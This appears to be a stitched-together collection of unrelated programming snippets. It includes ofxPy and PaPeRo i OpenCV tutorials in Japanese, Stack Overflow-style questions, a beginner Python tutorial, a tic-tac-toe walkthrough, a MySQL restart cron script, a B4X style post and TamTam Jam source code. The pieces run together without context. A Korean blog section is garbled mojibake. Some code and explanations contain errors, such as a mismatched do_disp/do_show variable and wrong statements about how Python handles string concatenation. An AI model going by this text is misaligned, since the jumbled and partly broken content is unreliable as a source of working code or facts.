こんな僕の記事よりもぜひそちらを読まれるべき.
というか読んでください.
この僕の記事には重要なポイントは載ってないです.
pyenvはこちらを参考にしました:
http://www.python-izm.com/contents/basis/pyenv.shtml
個人的にpythonとoFの連携に苦しんでいたので大変助かりました.
テストは @Hzikajr さんと全く同じ環境です.
satoruhigaさんのofxPy
https://github.com/satoruhiga/ofxPy
のexampleの一部も試しました.
print('hello from test_script.py')
def my_fn():
print ('hello from python function')
def my_fn2(theta):
import math
a = math.sin(theta * math.pi)
return a
def get_random():
import random
return (random.random(), random.random())
def size_expression(t):
import math
return abs(math.sin(t * math.pi) + math.sin(t * math.pi * 1.5))
#pragma once
#include "ofMain.h"
#include "ofxPy.h"
class ofApp : public ofBaseApp{
public:
void setup();
void update();
void draw();
void keyPressed(int key);
void keyReleased(int key);
void mouseMoved(int x, int y );
void mouseDragged(int x, int y, int button);
void mousePressed(int x, int y, int button);
void mouseReleased(int x, int y, int button);
void mouseEntered(int x, int y);
void mouseExited(int x, int y);
void windowResized(int w, int h);
void dragEvent(ofDragInfo dragInfo);
void gotMessage(ofMessage msg);
ofxPy::Context python;
};
#include "ofApp.h"
//--------------------------------------------------------------
void ofApp::setup(){
putenv((char *)"PYTHONHOME=/Users/ksumiya/.pyenv/versions/anaconda3-4.3.1");
python.setup();
ofSetFrameRate(60);
ofSetVerticalSync(true);
ofBackground(0);
// append data/python to PYTHONPATH
python.appendPath(ofToDataPath("python"));
// import and call python script function
python.exec("import test_script; test_script.my_fn()");
}
//--------------------------------------------------------------
void ofApp::update(){
ofSetWindowTitle(ofToString(ofGetFrameRate()));
}
//--------------------------------------------------------------
void ofApp::draw(){
// get tuple return value
auto v = python.eval<ofxPy::tuple>("test_script.get_random()");
// unpack and cast array-like object
float x = ofxPy::get<float>(v, 0) * ofGetWidth();
float y = ofxPy::get<float>(v, 1) * ofGetHeight();
ofDrawRectangle(x, y, 10, 10);
// get function and call with argument
float s = python.eval("test_script.size_expression").call(ofGetElapsedTimef()).cast<float>();
ofDrawCircle(ofGetMouseX(), ofGetMouseY(), s * 50);
float a = python.eval("test_script.my_fn2").call(0.25).cast<float>();
string msg;
msg += ofToString(1/a) + "\n";
ofSetColor(255);
ofDrawBitmapString(msg, 100, 100);
}
僕が足したのはmy_fn2の部分だけ.
結果として, 1/sin(pi/4) なので, sqrt(2)となり, 1.414...がでます.
先駆者様, 偉大だ…
|
```(aka backtick or grave accent) in a single line before and after the block. See: http://commonmark.org/help/
Getting stuck in calculating average turnover
Trying to calculate average turnover
def __init__(self):
self.addminperiod(260)
self.stocks = self.datas[2:]
for d in self.stocks:
self.inds[d] = {}
turnover = d.close * d.volume
print (d.open[0],d.high[0],d.low[0],d.close[0],d.volume[0], d.openinterest[0])
self.inds[d]["avg_turnover"] = bt.indicators.SimpleMovingAverage(turnover,period=20)
ohlcv data is printed correctly
In
nextfunction, when i try to print average turnoverprint(self.inds[d]["avg_turnover"][0]), I am gettingnanas output.. expecting average turnover.
Any pointers would be very useful.
post whole script from the beginning to the end please.
|
Im trying to connect to aws using boto but Im having an error.
First, I created an aws account and then in managment console I clicked in IAM and I created a new user.
This user have associated a AWS_ACESS_KEY_ID and a AWS_SECRET_ACESS_KEY.
And then I stored this user credentials in /etc/boto.cfg and in ~/.boto, like this:
[Credentials]aws_acess_key_id = ...aws_secret_acess_key = ...
Now Im trying to connect to boto but Im having this error:
Traceback (most recent call last):
File "send.py", line 12, in <module>
s3 = boto.connect_s3()
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/__init__.py", line 141, in connect_s3
return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/s3/connection.py", line 190, in __init__
validate_certs=validate_certs, profile_name=profile_name)
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/connection.py", line 569, in __init__
host, config, self.provider, self._required_auth_capability())
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/auth.py", line 985, in get_auth_handler
'Check your credentials' % (len(names), str(names)))
boto.exception.NoAuthHandlerFound: No handler was ready to authenticate. 1 handlers were checked. ['HmacAuthV1Handler'] Check your credentials
boto [DEBUG]:Retrieving credentials from metadata server.
[ERROR]:Caught exception reading instance data
Do you see what can be wrong here?
|
A Python Tutorial, the Basics
ð A very easy Python Tutorial! ð
#Tutorial Jam
@elipie's jam p i n g
p i n g
Here is a basic tutorial for Python, for beginners!
Table of Contents:
1. The developer of python
2. Comments/Hashtags
3. Print and input statements
f' strings
4. If, Elif, Else statements
5. Common Modules
1. Developer of Python
It was created in the late 1980s by Guido van Rossum in the Netherlands. It was made as a successor to the ABC language, capable interfacing with the Ameoba operating system. It's name is python because when he was thinking about Python, he was also reading, 'Monty Python's Flying Circus'. Guido van Rossum thought that the langauge would need a short, unique name, so he chose Python.
For more about Guido van Rossum, click here
2. Comments/Hastags
Comments are side notes you can write in python. They can be used, as I said before:
sidenotes
instructions or steps
etc.
How to write comments:
#This is a comment
The output is nothing because:
It is a comment and comments are invisible to the computer
Comments are not printed in Python
So just to make sure, hastags are used to make comments. And remember, comments are ignored by the computer.
3. Print and Input statements
1. Print Statements
Print statements, printed as print, are statements used to print sentences or words. So for example:
print("Hello World!")
The output would be:
Hello World!
So you can see that the print statement is used to print words or sentences.
2. Input Statements
Input statements, printed as input, are statements used to 'ask'. For example:
input("What is your name?")
The output would be:
What is your name?
However, with inputs, you can write in them. You can also 'name' the input. Like this:
name = input("What is your name?")
You could respond by doing this:
What is your name? JBYT27
So pretty much, inputs are used to make a value that you can make later.
Then you could add a if statement, but lets discuss that later.
3. f strings
f strings, printed as f(before a qoutation), is used to print or input a value already used. So what I mean is, say I put an f string on a print statement. Like this:
print(f"")
The output right now, is nothing. You didn't print anything. But say you add this:
print(f"Hello {name}!")
It would work, only if the name was named. In other words, say you had a input before and you did this to it:
name = input()
Then the f string would work. Say for the input, you put in your name. Then when the print statement would print:
Hello (whatever your name was)!
Another way you could do this is with commas. This won't use an f string either. They are also simaler. So how you would print it is like this:
name = input()
...
print("Hello ", name, "!")
The output would be the same as well! The commas seperate the 2 strings and they add the name inside. But JBYT27, why not a plus sign? Well, this question you would have to ask Guido van Rossum, but I guess I can answer it a bit. It's really the python syntax. The syntax was made that so when you did a plus sign, not a comma, it would give you an error.
Really, the only time you would use this is to give back your name, or to find if one value was equal to each other, which we'll learn in a sec.
4. If, Elif, Else Statements
1. If Statements
If statements, printed as if, are literally as they are called, if sentences. They see if a sentence equals or is something to an object, it creates an effect. You could think an if statement as a cause and effect. An example of a if statement is:
name = input("What is your name?")
#asking for name
if name == "JBYT27":
print("Hello Administrator!")
The output could be:
What is your name? JBYT27Hello Administrator!
However, say it isn't JBYT27. This is where the else, elif, try, and except statements comes in!
2. Elif Statements
Elif statements, printed as elif are pretty much if statements. It's just that the word else and if are combined. So say you wanted to add more if statements. Then you would do this:
if name == "JBYT27":
print("Hello Administrator!")
elif name == "Code":
print("Hello Code!")
It's just adding more if statements, just adding a else to it!
3. Else Statements
Else statments, printed as else, are like if and elif statements. They are used to tell the computer that if something is not that and it's not that, go to this other result. You can use it like this (following up from the other upper code):
if name == "JBYT27":
print("Hello admin!")
elif name == "Squid":
print("Hello Lord Squod!")
else:
print(f"Hello {name}!")
5. Common Modules
Common modules include:
os
time
math
sys
replit
turtle
tkinter
random
etc.
So all these modules that I listed, i'll tell you how to use, step by step! ;) But wait, what are modules?
Modules are like packages that are pre-installed in python. You just have to fully install it, which is the module(please correct me if im wrong). So like this code:
import os
...
When you do this, you successfully import the os module! But wait, what can you do with it? The most common way people use the os module is to clear the page. By means, it clears the console(the black part) so it makes your screen clear-er. But, since there are many, many, many modules, you can also clear the screen using the replit module. The code is like this:
import replit
...
replit.clear()
But one amazing thing about this importing is you can make things specific. Like say you only want to import pi and sqrt from the math package. This is the code:
from math import pi, sqrt
Let me mention that when you do this, never, ever add an and. Like from ... import ... and .... That is just horrible and stupid and... Just don't do it :)
Next is the time module
You can use the time module for:
time delay
scroll text
And yeah, that's pretty much it (i think)
Note:
All of the import syntax is the same except for the names
Next is tkinter, turtle
You can use the tkinter module for GUI's (screen playing), you can import it in a normal python, or you can do this in a new repl.
You can use the turtle for drawing, it isn't used much for web developing though.
The math and sys
The math is used for math calculations, to calculate math. The sys is used for accessing used variables. I don't really know how I could explain it to you, but for more, click here
Random
The random module is used for randomizing variables and strings. Say you wanted to randomize a list. Here would be the code:
import random
...
a_list = ["JBYT27","pie","cat","dog"]
...
random.choice(a_list)
The output would be a random choice from the variable/list. So it could be pie, JBYT27, cat, or dog. From the random module, there are many things you can import, but the most common are:
choice
randrange
etc.
And that's all for modules. If you want links, click below.
Links for modules:
And that's it!
Hooray! We made it through without sleeping!
Credits to:
Many coders for tutorials
Books and websites
replit
etc.
Links:
Web links:
ranging from a few days or hoursifyoulikereading
Video links:
ranging from 1-12 hoursifyoudon'tlike reading
Otherwise:
ranging from 5 hours-a few daysreplittutorial links
I hope you enjoyed this tutorial! I'll cya on the next post!
stay safe!
You are viewing a single comment. View All
|
「Raspberry Pi 上の OpenCV でPaPeRo i に人の顔を数えさせる」では、あらかじめ用意されていた学習結果データを使用して人の顔を認識させましたが、開発したいアプリケーションによっては、「人の顔ではなく、別な物を認識させたい」というケースもあるかと思います。
今回はその一例として、PaPeRo i の顔の画像をOpenCVに学習させ、その後、PaPeRo i の画像を含む資料の印刷物をPaPeRo i に見せて、そこに含まれる PaPeRo i の台数を PaPeRo i に発話させてみます。
使用した Raspberry Pi は 「Raspberry Pi 上の OpenCV でPaPeRo i に人の顔を数えさせる」と同じく Raspberry Pi 3 model B v1.2、RaspbianはStretchです。
今回の結果は残念ながら、あまり思わしいものではありませんでしたが、学習に使用する画像枚数の増加等により、改善できる可能性はあると思います。
前提
以下の説明は、「Raspberry Pi 上の OpenCV でPaPeRo i に人の顔を数えさせる」の作業が実施済である事を前提とします。
画像ファイルの準備
学習に使用する画像として、下記を準備します。
・ポジティブ画像(PaPeRo i の顔の画像) → 1枚:paperoi.png
・ネガティブ画像(PaPeRo i の顔が写っていない画像) → 30枚:img001.png ~ img030.png
ポジティブ画像は、複数の画像を自分で用意する方法と、学習の準備段階で1枚の画像から複数枚自動生成する方法がありますが、今回は準備の手間を省くため、後者の方法をとります。
ネガティブ画像についても、本来はもっと多い方がよいと思うのですが、今回は30枚で試す事にします。
画像の作成方法としましては、PaPeRo i アプリ紹介ページに掲載されているパンフレットの画像からPaPeRo i の顔を切り出してポジティブ画像とし、ネガティブ画像は同パンフレットやシミュレータのスクリーンショットからPaPeRo i 以外の部分を切り出して作成しました。
また、ポジティブ画像については、元画像が1枚のみである事から、学習の過程で背景を顔の一部と解釈される事を懸念し、背景を白く塗りつぶして使用しました。
作業手順(Raspberry Pi)
(1) 作業場所を作成します。
$ cd ~/papero$ mkdir traincascade$ cd traincascade$ mkdir pos$ mkdir vec$ mkdir neg$ mkdir cascade$ cd cascade$ mkdir paperoi
ディレクトリを作成したら、ポジティブ画像(paperoi.png)を~/papero/traincascade/pos の下へ、ネガティブ画像(img001.png~img030.png)を ~/papero/traincascade/neg の下へ、それぞれ配置します。
ここまでの作業で、ディレクトリ構成は下記のようになります。
~/ papero/ pypapero.py traincascade/ pos/ paperoi.png vec/ neg/ img001.png img002.png ... img030.png cascade/ paperoi/
(2) opencv_createsamples でポジティブ画像をベクトル化します。
$ cd ~/papero/traincascade
$ opencv_createsamples -img ./pos/paperoi.png -vec ./vec/paperoi.vec -bgcolor 255 -num 50
-num 50 の指定により、元画像であるpaperoi.pngをXYZ軸に対してデフォルトの範囲でランダムに回転した50枚の画像が内部的に生成され、それらの画像から1つのベクトルファイル paperoi.vec が生成されます。
Raspberry Pi のデスクトップ上に開いたターミナルから実行する場合、
$ opencv_createsamples -img ./pos/paperoi.png -vec ./vec/paperoi.vec -num 50 -bgcolor 255 -show
のように、-show オプションを付ける事により、内部的に生成された画像を見る事ができます。画像は1枚ずつ表示され、Enterキーで次の画像に進みます。
(3) ネガティブ画像のリストを作ります。
$ find ./neg -name "*.png" > nglist.txt
(4) 学習を行い、学習結果を生成します。
$ opencv_traincascade -data ./cascade/paperoi/ -vec ./vec/paperoi.vec -bg ./nglist.txt -numPos 45 -numNeg 30
-numPos の後の数字でポジティブ画像の枚数を指定するのですが、paperoi.vec に含まれる全画像数である50を指定すると、画像のうちの一部が「ポジティブ画像としてふさわしくない」と判断された場合にエラーとなる為、9割である45を指定しています。
学習が開始されると、下記のように、学習の進捗状況が表示されます。
PARAMETERS:
cascadeDirName: ./cascade/paperoi/
vecFileName: ./vec/paperoi.vec
bgFileName: ./nglist.txt
numPos: 45
numNeg: 30
numStages: 20
precalcValBufSize[Mb] : 1024
precalcIdxBufSize[Mb] : 1024
acceptanceRatioBreakValue : -1
stageType: BOOST
featureType: HAAR
sampleWidth: 24
sampleHeight: 24
boostType: GAB
minHitRate: 0.995
maxFalseAlarmRate: 0.5
weightTrimRate: 0.95
maxDepth: 1
maxWeakCount: 100
mode: BASIC
Number of unique features given windowSize [24,24] : 162336
===== TRAINING 0-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 30 : 1
Precalculation time: 1
+----+---------+---------+
| N | HR | FA |
+----+---------+---------+
| 1| 1| 0|
+----+---------+---------+
END>
Training until now has taken 0 days 0 hours 0 minutes 3 seconds.
===== TRAINING 1-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 30 : 0.148515
Precalculation time: 1
+----+---------+---------+
| N | HR | FA |
+----+---------+---------+
| 1| 1| 0|
+----+---------+---------+
END>
Training until now has taken 0 days 0 hours 0 minutes 7 seconds.
...
===== TRAINING 6-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 30 : 3.83055e-06
Precalculation time: 0
+----+---------+---------+
| N | HR | FA |
+----+---------+---------+
| 1| 1| 0|
+----+---------+---------+
END>
Training until now has taken 0 days 0 hours 6 minutes 14 seconds.
===== TRAINING 7-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 0 : 0
Required leaf false alarm rate achieved. Branch training terminated.
学習が完了すると、-data オプションで指定した ./cascade/paperoi/ の下に、cascade.xml というファイルが生成されます。
また、学習の途中で Ctrl+C で強制終了した場合も、./cascade/paperoi/ の下に中間ファイルが残されているため、次回同じオプションで opencv_traincascade を実行すると、中断した stage から学習が再開されます。
学習にかかる時間は opencv_createsamples によりランダムに生成される画像に依存して変動するようですが、5~7分程度でした。
(5) 下記の内容をコピー・ペーストして、cv_numpaperoi.py を作成し、~/papero の下に置きます。
※ ****ユーザ名****、****パスワード**** の部分につきましては、PaPeRo i に一般ユーザでログインする際に使用するユーザ名とパスワードに置き換えて下さい。
import argparse
import time
from enum import Enum
from paramiko import SSHClient,AutoAddPolicy
from scp import SCPClient
import cv2
import pypapero
class State(Enum):
st0 = 10
st1 = 11
st2 = 12
st3 = 13
st4 = 14
end = 999
def main(papero, host, do_disp):
prev_time = time.monotonic()
past_time = 0
interval_time = 0
state = State.st0
first = True
print("HOST=" + host)
PORT = 22
USER = "****ユーザ名****"
PSWD = "****パスワード****"
scp = None
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
ssh.connect(host, port=PORT, username=USER, password=PSWD)
scp = SCPClient(ssh.get_transport())
cascade_file = 'traincascade/cascade/paperoi/cascade.xml'
face_cascade = cv2.CascadeClassifier(cascade_file)
num_face_now = 0
num_face = 0
while state != State.end:
messages = papero.papero_robot_message_recv(0.1)
now_time = time.monotonic()
delta_time = now_time - prev_time
prev_time = now_time
if messages is not None:
msg_dic_rcv = messages[0]
else:
msg_dic_rcv = None
if papero.errOccurred != 0:
print("------Error occured(main()). Detail : " + papero.errDetail)
break
if state == State.st0:
papero.send_start_speech("検知したパペロの数を発話します。座布団のボタンで終了します。")
past_time = 0.0
state = State.st1
elif state == State.st1:
past_time += delta_time
if past_time > 0.5:
papero.send_get_speech_status()
state = State.st2
elif state == State.st2:
if msg_dic_rcv is not None:
if msg_dic_rcv["Name"] == "getSpeechStatusRes":
if str(msg_dic_rcv["Return"]) == "0":
state = State.st3
else:
past_time = 0
state = State.st1
elif state == State.st3:
past_time += delta_time
if past_time >= interval_time:
papero.send_take_picture("JPEG", filename="tmp.jpg", camera="VGA")
past_time = 0
state = State.st4
elif state == State.st4:
if msg_dic_rcv is not None:
if msg_dic_rcv["Name"] == "takePictureRes":
scp.get("/tmp/tmp.jpg")
img = cv2.imread("tmp.jpg")
if img is not None:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
num_face_now = len(faces)
print("num_face_now=" + str(num_face_now))
if num_face_now != num_face:
papero.send_start_speech("パペロは"+str(num_face_now)+"台です")
num_face = num_face_now
if do_show:
for (x,y,w,h) in faces:
cv2.rectangle(img, (x,y), (x+w,y+h), (255,0,0), 2)
cv2.imshow('image', img)
cv2.waitKey(1)
state = State.st3
if msg_dic_rcv is not None:
if msg_dic_rcv["Name"] == "detectButton":
state = State.end
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = "Usage:")
parser.add_argument("host", type=str, help = "Host IP address")
parser.add_argument("-img", help = "Display image", action='store_true')
command_arguments = parser.parse_args()
simulator_id = ""
robot_name = ""
host = command_arguments.host
do_show = command_arguments.img
ws_server_addr = "ws://" + host + ":8088/papero"
papero = pypapero.Papero(simulator_id, robot_name, ws_server_addr)
main(papero, host, do_show)
papero.papero_cleanup()
「Raspberry Pi 上の OpenCV でPaPeRo i に人の顔を数えさせる」で作成したcv_numface.pyでは、
face_cascade = cv2.CascadeClassifier(cascade_file)
で使用するcascade_fileへの代入文が、
cascade_file = '/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml'
となっていましたが、今回の cv_numpaperoi.py では
cascade_file = 'traincascade/cascade/paperoi/cascade.xml'
のように、今回の学習で生成された cascade.xml を指定しています。
また、数える物が変わったのに合わせて、発話するセリフも若干変えています。
(6) cv_numpaperoi.py を実行します。
$ cd ~/papero$ python3 cv_numpaperoi.py PaPeRoiのIPアドレス
実行すると、PaPeRo i が「検知したパペロの数を発話します。座布団のボタンで終了します。」と発話した後、カメラに映ったPaPeRo i の顔を認識したらその数をカウントし、数に変化があった時に、その数を発話するようになります。
Raspberry pi のデスクトップ上に開いたターミナルでで実行する場合、
$ python3 cv_numpaperoi.py PaPeRoiのIPアドレス -img
のように -img オプションをつけて実行すると、カメラで撮影された画像と検知した顔の範囲が表示されます。
結果
今回の実験では、学習に使用した画像枚数が少なかったためか、PaPeRo i が掲載されている資料の印刷物を PaPero i に見せても、時々しか認識されず、複数写っている PaPeRo i が全てカウントされる事は、ほとんどありませんでした。
ポジティブ画像の背景が白一色であったせいか、PaPeRo i の背景が白一色でない画像についての認識状況が特に悪いようでした。
opencv_createsamples の-num オプションで指定する生成画像枚数を100及び200に変え、opencv_traincascade の -numPos の数字を90及び180に変えてみても、状況は改善しませんでした。
学習時間については -numPos の値を90にした時でも1分程度で学習が完了する場合もあり、画像枚数が増えれば学習時間が必ずしも増えるというわけではないようです。
今回、ポジティブ画像は1枚の画像から生成しましたが、背景を変えたものをいくつか追加すれば、認識精度が向上するかもしれません。
ただし、複数枚のポジティブ画像を自分で用意する場合、opencv_createsamples の自動回転機能は使えませんので、回転させた画像を含めて自前で作る必要があります。
画像枚数の増加と別PCでの学習
試しにopencv_createsamples の-num オプションで指定する生成画像枚数を1000にしてみた所、ベクトルファイルの作成には成功するものの、opencv_traincascade で -numPos 900 を指定すると、メモリ不足のためか途中で終了してしまい、Raspberry Pi 上では学習を完了させる事ができませんでした。
そこで、OpenCVをインストールした別PC(Windows10)で学習を行い、学習結果の cascade.xml を Raspberry Pi 上の ~/papero/traincascade/cascade/paperoi/ の下に配置し、cv_numpaperoi.py を実行してみました。
ポジティブ画像の元画像やネガティブ画像を増強したわけではないので、認識状況はやはり改善しませんでしたが、WindowsPC等の別マシンで作成した cascade.xml を Raspberry Pi 上で使う事については問題ないようです。
メモリ容量・CPUパワー等により Raspberry Pi 上での学習に問題がある場合は、基本性能の高い別PCで学習させるとよいでしょう。
|
Estoy entrenando un árbol de decisión con sklearn. Cuando uso:
dt_clf = tree.DecisionTreeClassifier()
el parámetro max_depth defecto es None . De acuerdo con la documentación, si max_depth es None , entonces los nodos se expanden hasta que todas las hojas estén puras o hasta que todas las hojas contengan menos muestras de min_samples_split .
Después de ajustar mi modelo, ¿cómo puedo saber qué es max_depth realmente? La función get_params() no ayuda. Después de ajustar, get_params() todavía dice None .
¿Cómo puedo obtener el número real para max_depth ?
Docs: https://scikit-learn.org/stable/modules/generated/sklearn.tree.DecisionTreeClassifier.html
Acceda a max_depth para el objeto Tree subyacente:
from sklearn import tree X = [[0, 0], [1, 1]] Y = [0, 1] clf = tree.DecisionTreeClassifier() clf = clf.fit(X, Y) print(clf.tree_.max_depth) >>> 1
Puede obtener atributos más accesibles del objeto del árbol subyacente utilizando:
help(clf.tree_)
Estos incluyen max_depth , node_count y otros parámetros de nivel inferior.
|
Noughts & Crosses Game in 69 lines of Python code
It seems like many people enjoy tutorials about making games. Well, let me make one too! Today we are going to be implementing the legendary "Noughts and Crosses" game in 69 lines of Python code! I am not going to overcomplicate matters with OOP and all that... a few functions will do.
First, let's create 2 global variables:
# GLOBAL VARIABLES
M = [
['_','_','_'],
['_','_','_'],
['_','_','_']
]
S = True
C = 0
M stores our game's 3 x 3 field. Classic. It is a 2D matrix, so I called it M. S holds the side: when S = True, it's X's turn and vice versa. C holds the number of moves made.
Now, let's write the main function. I called it xo() for simplicity. It has to:
Show an empty board
Start a whileloop that will repeat itself untilC == 9
Inside the loop, it has to
Ask user to make a move
Check if either of the two players won and if yes, breakitself
If the whileloop doesn't encounter abreakon its way, it means that the 9 moves are made, yet no one won, so it must be a tie!
# MAIN
def xo():
board_show() # FUNCTION NOT YET IMPLEMENTED!
while C < 9:
turn() # FUNCTION NOT YET IMPLEMENTED!
if big_check(): # FUNCTION NOT YET IMPLEMENTED!
print(f"{'X' if not S else 'O'} wins!", end="\n\n")
break
else: # if break not encountered, it must be a tie!
print("It's a tie!", end="\n\n")
The easiest function to implement is board_show(). Just print out our little matrix M. Don't forget to put some empty prints for spacing purposes!
def board_show():
print()
for y in range(3):
print(" ", end="")
for x in range(3):
print(M[y][x], end=" ")
print()
print()
Now, the turn() function is a bit trickier, yet not too complicated either. We want to:
Ask player where he/she wants to place his/her mark
Check if the selected square is free, and if it is, put X or O into it, change the State, andboard_show()to demonstrate the result
If it's not empty, we want to let the user know that the move was invalid and make him repeat it
def turn():
global S, C # allows us to reference S that is not assigned in this scope
pos = [ ( int(i) - 1 ) for i in input("Your move: ").split() ]
# this produces a list of two int values X and Y
# it reduces each one by 1 since computer (unlike human) starts counting from 0
x, y = pos[0], pos[1] # save x and y separately for clearance
if M[y][x] == '_':
M[y][x] = 'X' if S else 'O'
S = not S
C += 1 # increment move counter C by 1 only if the move is valid
board_show()
else:
print("Invalid move!")
Now that we have our turn() function nice and shining, we only need the big_check() function, only it's not so easy. The big_check() isn't called big for no reason -- it consists of three other functions:
check_hr(y)checkyth row
check_vr(x)checkxth column
check_dig()check both diagonals
But these are fairly simple and you will see why in a second. The only thing we need to do is to check whether all three positions have the same chr in them that is not '_' the default one.
def check_hr(y):
return M[y][0] == M[y][1] == M[y][2] != '_'
def check_vr(x):
return M[0][x] == M[1][x] == M[2][x] != '_'
def check_dig():
return M[0][0] == M[1][1] == M[2][2] != '_' or \
M[0][2] == M[1][1] == M[2][0] != '_'
Now, let's get to the big_check(). What it does essentially is it checks every row, column, and diagonal using the functions we've just written and if at least one of those function returns True, the whole big_check() function must return True!
def big_check():
win = False
for i in range(3):
if check_hr(i) or check_vr(i):
win = True
if check_dig():
win = True
return win
"Now we have everything! It's complete!" -- a newbie would say, but no, it's actually not. There is one last bit to it that will finally make it work -- the 69th line:
xo() # invoke the xo() function
|
1、检查 MySQL/MariaDB是否启动
import MySQLdb
import time
import subprocess
def excuteCommand(com):
ex = subprocess.Popen(com, stdout=subprocess.PIPE, shell=True)
out, err = ex.communicate()
status = ex.wait()
print("cmd in:", com)
print("cmd out: ", out.decode())
return out.decode()
p = subprocess.Popen('netstat -ntlp|grep mysql',shell=True,stdout=subprocess.PIPE)
status = p.stdout.readlines()
print(status)
if not status:
status = excuteCommand('systemctl start mariadb')
print(status)
2、测试
[root@vultr ~]# netstat -ntlp|grep mysql
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 7694/mysqld
[root@vultr ~]# systemctl stop mariadb
[root@vultr ~]# netstat -ntlp|grep mysql
[root@vultr ~]# lsof -i :3306
[root@vultr ~]# /opt/py3/bin/python /u01/mysql_mon.py
[]
[b'tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 8188/mysqld \n']
[root@vultr ~]# netstat -ntlp|grep mysql
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 8188/mysqld
[root@vultr ~]# lsof -i :3306
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
mysqld 8188 mysql 14u IPv4 4367907 0t0 TCP *:mysql (LISTEN)
3、创建后台监控任务
[root@vultr ~]# crontab -l
*/1 * * * * /opt/py3/bin/python /u01/mysql_mon.py
|
Recent Posts
Recent Comments
ê´ë¦¬ ë©ë´
ë³êµ°ì´ê¸ë£¨
[Fabric] fabric hello print on CentOS 8 본문
* 리ë ì¤
[Fabric] fabric hello print on CentOS 8
ë³êµ° ë³êµ°ì´ê¸ë£¨ 2021. 1. 11. 17:19
fabric hello print on CentOS 8
í ì¤í¸ íê²½
$ cat /etc/redhat-release
CentOS Linux release 8.1.1911 (Core)
$ python -V
Python 3.6.8
$ fab -V
Fabric 2.5.0
Paramiko 2.7.2
Invoke 1.5.0
fabfile.py íì¼ í¸ì§
$ vim fabfile.py
from fabric import task
@task
def hello(ctx):
print("hello world.")
fab ì¤í
fab hello
$ fab --listAvailable tasks: hello$ fab hellohello world.
'* 리ë ì¤' ì¹´í ê³ ë¦¬ì ë¤ë¥¸ ê¸
[linux] SSH Config ì¤ì ì¼ë¡ SSH ê°í¸íê² ì ìí기 (0) 2021.01.19
[Fabric] fabric hello print on CentOS 7 (0) 2021.01.11
[Fabric] fabric hello print on CentOS 8 (0) 2021.01.11
[Shell Script] ë°ë³µë¬¸ for ë¬¸ë² (0) 2021.01.07
[Apache] Apache ë¡ê·¸ logrotate(ë¡í ì´ë) ì¤ì (0) 2021.01.07
[ëª ë ¹ì´] diff ëª ë ¹ì´ (0) 2020.12.31
0 Comments
|
Expert
Licensed User
Just like the clothes you wear, the code you write will also reflect your personal style.
Let's get fancy, shall we?
Let's get fancy, shall we?
B4X:
'Ugly:
Dim validation As Boolean
Dim sum = 1 + 1 As Int
If sum = 2 Then validation = True
'Elegant:
Dim sum = 1 + 1 As Int
Dim validation = (sum = 2) As Boolean
B4X:
'Ugly:
a = a + 1
If a >= 100 then a = 100
'Elegant:
a = min(a + 1, 100)
B4X:
'Ugly:
a = a - 1
If a <= 0 then a = 0
'Elegant:
a = max(a - 1, 0)
Do you have some more fancy examples of elegant B4X code?
Share it with us!
Share it with us!
|
blob: f85899ddbfaf2fecdd23da34abde1bde829e696c (
plain
)
import locale
locale.setlocale(locale.LC_NUMERIC, 'C')
import signal , time , sys , os, shutil
import pygtk
pygtk.require( '2.0' )
import gtk
import gobject
import time
import common.Config as Config
from common.Util.CSoundClient import new_csound_client
from common.Util.Profiler import TP
from Jam.JamMain import JamMain
from common.Util.Trackpad import Trackpad
from gettext import gettext as _
import commands
from sugar.activity import activity
class TamTamJam(activity.Activity):
def __init__(self, handle):
# !!!!!! initialize threading in gtk !!!!!
# ! this is important for the networking !
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
gtk.gdk.threads_init()
activity.Activity.__init__(self, handle)
for snd in ['mic1','mic2','mic3','mic4']:
if not os.path.isfile(os.path.join(Config.DATA_DIR, snd)):
shutil.copyfile(Config.SOUNDS_DIR + '/' + snd , Config.DATA_DIR + '/' + snd)
os.system('chmod 0777 ' + Config.DATA_DIR + '/' + snd + ' &')
color = gtk.gdk.color_parse(Config.WS_BCK_COLOR)
self.modify_bg(gtk.STATE_NORMAL, color)
self.set_title('TamTam Jam')
self.set_resizable(False)
self.trackpad = Trackpad( self )
self.preloadTimeout = None
self.connect('notify::active', self.onActive)
self.connect('destroy', self.onDestroy)
#load the sugar toolbar
toolbox = activity.ActivityToolbox(self)
self.set_toolbox(toolbox)
self.activity_toolbar = toolbox.get_activity_toolbar()
toolbox.show()
self.trackpad.setContext('jam')
self.jam = JamMain(self)
self.connect('key-press-event', self.jam.onKeyPress)
self.connect('key-release-event', self.jam.onKeyRelease)
#self.modeList[mode].regenerate()
self.set_canvas( self.jam )
self.jam.onActivate(arg = None)
self.show()
def onPreloadTimeout( self ):
if Config.DEBUG > 4: print "TamTam::onPreloadTimeout", self.preloadList
t = time.time()
if self.preloadList[0].load( t + 0.100 ): # finished preloading this object
self.preloadList.pop(0)
if not len(self.preloadList):
if Config.DEBUG > 1: print "TamTam::finished preloading", time.time() - t
self.preloadTimeout = False
return False # finished preloading everything
if Config.DEBUG > 4: print "TamTam::preload returned after", time.time() - t
return True
def onActive(self, widget = None, event = None):
if widget.props.active == False:
Config.logwrite(1, 'Jam.onActivate disconnecting csound')
csnd = new_csound_client()
csnd.connect(False)
else:
Config.logwrite(1, 'Jam.onActivate connecting csound')
csnd = new_csound_client()
csnd.connect(True)
def onKeyPress(self, widget, event):
pass
def onKeyRelease(self, widget, event):
pass
